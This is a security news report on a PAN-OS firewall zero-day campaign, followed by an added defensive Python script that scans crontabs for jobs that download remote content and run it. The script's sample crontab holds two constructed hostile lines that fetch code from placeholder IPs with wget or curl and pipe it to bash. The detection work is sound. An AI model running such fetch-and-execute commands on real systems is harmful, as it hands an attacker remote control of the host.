Threat actors have been exploiting a zero-day flaw in Palo Alto Networks PAN-OS software since March 26, 2024, in a campaign tracked as Operation MidnightEclipse. The flaw allows an attacker to execute arbitrary code with root privileges on vulnerable firewalls. After exploitation, the attackers create a cron job that periodically fetches commands from an external server and runs them through a bash shell. The command-and-control server is protected by an access control list so that only the compromised device can reach it, which limits what researchers can retrieve from it.
The attack also involves a Python-based backdoor hosted on a separate server. Once deployed, it writes and launches a second Python script that executes the threat actor's commands. The backdoor runs each command and writes the output into legitimate files belonging to the firewall, then restores those files within 15 seconds so that the command output leaves little trace on disk.
The threat actor, tracked as UTA0218, has been observed exploiting the firewall to create a reverse shell, download additional tools, pivot into internal networks, and exfiltrate data. The scale of the campaign is currently unclear, but the attacker has shown a high level of capability and speed in achieving its objectives, targeting domain backup keys, Active Directory credentials, and user workstations.
Organizations are advised to monitor for signs of lateral movement originating from their Palo Alto Networks firewalls running GlobalProtect, since exploitation of the device itself may leave few traces. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog, requiring federal agencies to apply patches by April 19. Palo Alto Networks is expected to release fixes by April 14; until then, monitoring and the vendor's interim mitigations are the only defenses.
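The cron-based loader described above (a scheduled job that pulls commands from a remote server and executes them with bash) is a pattern a defender can look for whenever a crontab can be recovered from a device image, a forensic export, or an ordinary Linux host touched during lateral movement. The following Python is an added example, not code from the original article or from Palo Alto Networks; the crontab lines, IP addresses, hostnames and paths it scans are constructed for illustration and are not indicators from the campaign, and the downloader and shell lists and the every-minute heuristic are assumptions chosen for the example.

```python
import os
import re
import shlex
from typing import Dict, List

# Constructed sample crontab (illustrative only; the IPs, hostnames and paths
# are made up and are NOT indicators from the actual campaign).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/5 * * * * /usr/local/bin/logrotate_check.sh
* * * * * /usr/bin/wget -qO- http://198.51.100.7/patch | /bin/bash
0 3 * * * /usr/bin/curl -s https://updates.example.invalid/status.json > /tmp/status.json
* * * * * curl -s -o /tmp/.x http://203.0.113.21/cmd; bash /tmp/.x
"""

# Assumed lists: tools commonly used to pull content from a remote server,
# and shells that would execute it.  Extend both for your environment.
DOWNLOADERS = {"curl", "wget", "fetch", "python", "python3"}
SHELLS = {"bash", "sh", "dash", "zsh"}
URL_RE = re.compile(r"https?://\S+")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Return {"schedule", "command"} dicts for each active crontab line."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):            # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)    # five time fields + command
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append({"schedule": schedule, "command": command.strip()})
    return entries


def _segments(command: str) -> List[List[str]]:
    """Split a command line on pipes and sequencing operators into token lists."""
    segments = []
    for part in re.split(r"\|\||&&|[|;]", command):
        try:
            tokens = shlex.split(part)
        except ValueError:                  # unbalanced quotes: fall back
            tokens = part.split()
        if tokens:
            segments.append(tokens)
    return segments


def is_suspicious(command: str) -> bool:
    """True if the command fetches from a URL and hands the result to a shell."""
    segments = _segments(command)
    fetches_remote = any(
        os.path.basename(seg[0]) in DOWNLOADERS and URL_RE.search(" ".join(seg))
        for seg in segments
    )
    runs_shell = any(os.path.basename(seg[0]) in SHELLS for seg in segments)
    return bool(fetches_remote and runs_shell)


def find_suspicious_entries(text: str) -> List[Dict[str, object]]:
    """Flag crontab entries matching the fetch-then-execute pattern."""
    hits = []
    for entry in parse_crontab(text):
        if is_suspicious(entry["command"]):
            hits.append({
                **entry,
                # A polling job that fires every minute is an extra signal
                # (assumed heuristic, not a fact from the article).
                "every_minute": entry["schedule"] == "* * * * *",
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_entries(SAMPLE_CRONTAB):
        flag = " (runs every minute)" if hit["every_minute"] else ""
        print(f"SUSPICIOUS: [{hit['schedule']}] {hit['command']}{flag}")
```

Run as-is, the script flags the two constructed entries that pipe or hand off a downloaded payload to bash and leaves the plain download and the local script alone. Feed it the output of `crontab -l` per user, `/etc/crontab`, and the files under `/etc/cron.d` on hosts you can reach; treat a hit as a lead rather than proof, since legitimate update scripts also fetch and run content, and pair it with the lateral-movement monitoring the article recommends.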
The attack highlights the ongoing risk of edge devices being targeted by sophisticated threat actors. UTA0218 is suspected to be a state-backed threat actor based on its resources, choice of victims, and capabilities. Organizations should remain vigilant and apply security patches promptly once they are available to mitigate the threat.
